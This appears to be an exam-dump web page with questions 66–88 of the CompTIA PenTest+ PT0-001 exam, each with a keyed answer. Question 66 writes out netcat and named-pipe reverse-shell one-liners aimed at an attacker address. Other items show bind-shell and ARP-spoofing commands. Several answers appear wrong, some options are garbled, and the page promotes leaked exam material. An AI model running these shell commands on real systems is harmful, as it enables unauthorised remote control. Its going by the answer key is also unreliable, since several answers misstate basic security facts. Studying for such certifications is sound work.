Practice CompTIA PenTest+ PT0-001 exam. Online Exam Practice Tests with detailed explanations! Pass PT0-001 with confidence!
PT0-001 - CompTIA PenTest+ Certification Exam Practice Tests 2021 | UpdateDumps
NEW QUESTION 66
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO)
- A. nc 192.168.1.5 44444
- B. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh -I 2>&1|nc 192.168.1.5 444444>/tmp /f
- C. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh -I 2>&1|nc 192.168.1.5 44444>/tmp /f
- D. nc -e /bin/sh 192.168.1.5 4444
- E. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh -I 2>&1|nc 192.168.5.1 44444>/tmp /f
- F. nc -nlvp 4444 -e /bin/sh
Answer: D,E
NEW QUESTION 67
A penetration tester has compromised a system and wishes to connect to a port on it from the attacking machine to control the system Which of the following commands should the tester run on the compromised system?
- A. nc 127.0.0.1 4423 -e /bin/bash
- B. nc looalhot 4423
- C. nc -nvlp 4423 -a /bin/bash
- D. nc 10.0.0.1 4423
Answer: C
NEW QUESTION 68
Which of Ihe following commands would allow a penetration tester to access a private network from the Internet in Metasploit?
- A. run autoroute -a 192.168.1.0/24
- B. set rhost 192.168.1.10
- C. db_nmap -iL /tmp/privatehoots . txt
- D. use auxiliary/servet/aocka^a
Answer: A
NEW QUESTION 69
Click the exhibit button.
Given the Nikto vulnerability scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Select TWO)
- A. Cross-site request forgery
- B. Arbitrary code execution
- C. Session hijacking
- D. SQL injection
- E. Login credential brute-forcing
Answer: A,D
NEW QUESTION 70
Instructions:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the reset all button.
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
Answer:
Explanation:
NEW QUESTION 71
A security consultant found a SCADA device in one of the VLANs in scope. Which of the following actions would BEST create a potentially destructive outcome against device?
- A. Launch a DNS cache poisoning attack against the device.
- B. Lunch a Nessus vulnerability scan against the device.
- C. Launch an SMB exploit against the device.
- D. Launch an SNMP password brute force attack against the device.
Answer: D
NEW QUESTION 72
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
- A. Stack base pointer
- B. Destination index register
- C. Stack pointer register
- D. Index pointer register
Answer: C
NEW QUESTION 73
A penetration tester is performing a remote internal penetration test by connecting to the testing system from the Internet via a reverse SSH tunnel. The testing system has been placed on a general user subnet with an IP address of 192.168.1.13 and a gateway of 192.168.1.1. Immediately after running the command below, the penetration tester's SSH connection to the testing platform drops:
Which of the following ettercap commands should the penetration tester use in the future to perform ARP spoofing while maintaining a reliable connection?
# sudo ettercap -Tq -w output.cap -M ARP /192.168.1.0/ /192.168.1.255/
- A. # ettercap -Tq -w output.cap -M ARP 00:00:00:00:00:00//80
- B. # proxychains ettercap -Tq -w output.cap -M ARP /192.168.1.13/ /192.168.1.1/
- C. FF:FF:FF:FF:FF:FF//80
# ettercap --safe-mode -Tq -w output.cap -M ARP /192.168.1.2- - D. 255/ /192.168.1.1/
- E. 255/ /192.168.1.13/
# ettercap -Tq -w output.cap -M ARP /192.168.1.2-12;192.168.1.14-
Answer: B
Explanation:
Explanation
Explanation/Reference:
NEW QUESTION 74
After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to remediate the use of common dictionary terms?
- A. Disable the accounts after five incorrect attempts
- B. Configure password filters
- C. Expand the password length from seven to 14 characters
- D. Decrease the password expiration window
- E. Implement password history restrictions
Answer: C
NEW QUESTION 75
A penetration tester is testing a web application and is logged in as a lower-privileged user. The tester runs arbitrary JavaScript within an application, which sends an XMLHttpRequest, resulting in exploiting features to which only an administrator should have access.
Which of the following controls would BEST mitigate the vulnerability?
- A. Add client-side security controls
- B. Prevent directory traversal.
- C. Sanitize all the user input.
- D. Implement authorization checks.
Answer: D
NEW QUESTION 76
A security consultant is trying to attack a device with a previously identified user account.
Which of the following types of attacks is being executed?
- A. Reverse shell attack
- B. Credential dump attack
- C. DLL injection attack
- D. Pass the hash attack
Answer: D
NEW QUESTION 77
The following command is run on a Linux file system:
Chmod 4111 /usr/bin/sudo
Which of the following issues may be exploited now?
- A. Kernel vulnerabilities
- B. Misconfigured sudo
- C. Sticky bits
- D. Unquoted service path
Answer: C
NEW QUESTION 78
A penetration tester is designing a phishing campaign and wants to build list of users (or the target organization. Which of the following techniques would be the MOST appropriate? (Select TWO)
- A. Query an Internet WHOIS database.
- B. Socially engineer the corporate call center.
- C. Search posted job listings.
- D. Scrape the company website.
- E. Harvest users from social networking sites.
Answer: A,C
NEW QUESTION 79
Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented Each password may be used only once
Answer:
Explanation:
Explanation
1.) Zverlory
2.) Zverl0ry
3.) zv3rl0ry
4.) Zv3r!0ry
NEW QUESTION 80
A penetration tester is performing a black-box test of a client web application, and the scan host is unable to access it. The client has sent screenshots showing the system is functioning correctly. Which of the following is MOST likely the issue?
- A. An IPS/WAF whitelist is in place to protect the environment.
- B. The penetration tester needs an OAuth bearer token.
- C. The tester has provided an incorrect password for the application.
- D. The penetration tester was not provided with a WSDL file.
Answer: B
NEW QUESTION 81
At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?
- A. Enumeration of services
- B. OSINT gathering
- C. Port scanning
- D. Social engineering
Answer: B
NEW QUESTION 82
A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?
- A. Hacktivist
- B. Script kiddie
- C. Advanced persistent threat
- D. Organized crime
Answer: D
NEW QUESTION 83
A penetration tester ran the following Nmap scan on a computer:
nmap -aV 192.168.1.5
The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH. Which of the following is the BEST explanation for what happened?
- A. Nmap results contain a false positive for port 23.
- B. The organization failed to disable Telnet.
- C. Port 22 was filtered.
- D. The service is running on a non-standard port.
Answer: B
NEW QUESTION 84
A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?
- A. Nikto
- B. W3AF
- C. Swagger
- D. WAR
Answer: C
Explanation:
Explanation/Reference: https://blog.securelayer7.net/api-penetration-testing-with-owasp-2017-test-cases/
NEW QUESTION 85
A penetration tester successfully exploits a DM2 server that appears to be listening on an outbound port The penetration tester wishes to forward that traffic back to a device Which of the following are the BEST tools to use few this purpose? (Select TWO)
- A. Wiresrtark
- B. Nmap
- C. SSH
- D. Cain and Abel
- E. Tcpdump
- F. Netcat
Answer: C,F
NEW QUESTION 86
The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test. Which of the following are the MOST likely causes for this difference? (Select TWO)
- A. Limited network access
- B. Misconfigured DHCP server
- C. Network access controls
- D. Incorrect credentials
- E. Storage access
Answer: A,E
NEW QUESTION 87
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.6. Which of the following commands will test if the VPN is available?
- A. nc 100.170.60.5 8080 /bin/sh
- B. ike-scan -A -t 1 --sourceip=apoof_ip 100.170.60.5
- C. fpipe.exe -1 8080 -r 80 100.170.60.5
- D. nmap -sS -A -f 100.170.60.5
Answer: B
NEW QUESTION 88
......
Get instant access to PT0-001 practice exam questions: https://drive.google.com/open?id=1sNhfi5lEuiGNVgzyb5yKllqq94KzRUYC
The best PT0-001 exam study material and preparation tool is here: https://www.updatedumps.com/CompTIA/PT0-001-updated-exam-dumps.html